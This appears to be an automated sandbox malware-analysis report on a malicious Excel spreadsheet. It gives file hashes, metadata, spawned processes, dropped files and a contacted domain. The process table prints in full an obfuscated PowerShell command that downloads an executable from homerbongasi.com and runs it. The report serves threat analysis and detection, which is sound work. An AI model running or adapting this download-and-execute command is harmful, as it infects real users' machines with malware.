Field | Value |
---|---|
File name | 12_46da8413.2050406.xls |
Full analysis | https://app.any.run/tasks/353f8778-118f-4599-b33e-f960385f0d90 |
Verdict | Malicious activity |
Analysis date | November 14, 2018, 07:24:24 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/vnd.ms-excel |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Oct 19 08:59:05 2017, Last Saved Time/Date: Mon Dec 18 07:23:27 2017, Security: 0 |
MD5 | E57F8E8BC90F3E9CFB7211C0730353F5 |
SHA1 | 39103B95D2A626612A9F9644361162D24C150358 |
SHA256 | D66B480E06F3A844A9C30A1A6A0966C3D0922F95DA2010E03A328504F1B449D0 |
SSDEEP | 1536:fUdvxHlcaQPy0iWYOcG4BDhnxD7oOEdxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAnr:fUdvxHlcaAy0iWYOcG4BDhnxD7oOEdxf |
Extension | Type |
---|---|
.xls | Microsoft Excel sheet (48) |
.xls | Microsoft Excel sheet (alternate) (39.2) |
Field | Value |
---|---|
Software | Microsoft Excel |
CreateDate | 2017:10:19 07:59:05 |
ModifyDate | 2017:12:18 07:23:27 |
Security | None |
CodePage | Unicode (UTF-8) |
AppVersion | 14 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | 12月 |
HeadingPairs | |
CompObjUserTypeLen | 31 |
CompObjUserType | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
3636 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
3936 | cMD.exe /c "p^ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='carom';$ji='.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://homerbongasi.com/pvideo.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)" | C:\Windows\system32\cMD.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2348 | powERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='carom';$ji='.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://homerbongasi.com/pvideo.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cMD.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3636 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3071.tmp.cvr | — | — | — |
3636 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | — | — | — |
2348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KHE59LCKQIFM7IMXHIBA.temp | — | — | — |
2348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183ae1.TMP | binary | 2E6C332796340AFFBFF5230455889D0D | 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
2348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2E6C332796340AFFBFF5230455889D0D | 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
Domain | IP | Reputation |
---|---|---|
homerbongasi.com | | unknown |